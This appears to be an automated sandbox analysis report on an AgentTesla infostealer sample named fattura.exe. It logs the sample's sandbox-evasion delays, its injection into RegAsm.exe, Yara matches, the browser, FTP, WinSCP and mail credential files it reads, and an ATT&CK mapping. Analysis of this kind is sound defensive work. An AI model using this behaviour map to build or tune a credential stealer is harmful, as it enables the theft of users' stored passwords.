Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -45750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -39750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -36750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -33750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -80388s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -51592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -77061s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -51186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -76500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -76170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -75420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -75138s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -74811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -49500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -49186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -73500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -73170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -48592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -48374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -72138s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -71811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -47500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -47280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -70170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -46592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -46374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -46186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -45280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -45092s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -44874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -44592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -44374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -44186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -43780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -43280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -43092s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -42874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -42686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -63750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -42186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -41780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -62388s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -41374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -41092s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -40874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -40686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -60750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -60420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -39780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -59388s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -39374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -58779s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -39000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -38686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -57750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -57420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -57138s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -56811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -56388s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -37374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -55779s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -37000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -55170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -54420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -54138s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -53811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -35186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -52170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -51138s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -50811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -33686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -33000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -49170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -37500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -32250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -59686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -59500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -58874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -58592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -58374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -58186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -57780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -57500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -56874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -56686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -56186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -55780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -55592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -55374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -54686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -54280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -53780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -53374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -53000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -52686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -52280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -52092s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -51874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -35592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -35374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -34280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -33374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -33186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -32280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -32092s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -31874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -31592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -31374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -31186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -30280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -30092s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Last function: Thread delayed

Source: RegAsm.exe, 00000002.00000002.921880855.0000000005A70000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000002.00000002.921880855.0000000005A70000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe, 00000002.00000002.921880855.0000000005A70000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000002.00000003.868860155.0000000005B9D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegAsm.exe, 00000002.00000002.921880855.0000000005A70000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_02700740 LdrInitializeThunk,

2_2_02700740

Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_055001CB mov eax, dword ptr fs:[00000030h]	0_2_055001CB
Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_055000AD mov ecx, dword ptr fs:[00000030h]	0_2_055000AD
Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_055000AD mov eax, dword ptr fs:[00000030h]	0_2_055000AD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\fattura.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\fattura.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\fattura.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 95A008

Jump to behavior

Source: C:\Users\user\Desktop\fattura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe			Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe			Jump to behavior

Source: RegAsm.exe, 00000002.00000002.920074054.00000000011C0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000002.00000002.920074054.00000000011C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000002.00000002.920074054.00000000011C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000002.00000002.920074054.00000000011C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\fattura.exe	Queries volume information: C:\Users\user\Desktop\fattura.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_05CD2654 GetUserNameW,

2_2_05CD2654

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667877836.0000000004B03000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.669949286.00000000057F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.669771908.0000000005512000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fattura.exe PID: 3984, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 864, type: MEMORY
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.fattura.exe.5510000.1.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 864, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667877836.0000000004B03000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.669949286.00000000057F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.669771908.0000000005512000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fattura.exe PID: 3984, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 864, type: MEMORY
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.fattura.exe.5510000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection212	Obfuscated Files or Information2	Input Capture11	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing3	Credentials in Registry1	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	Security Software Discovery111	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
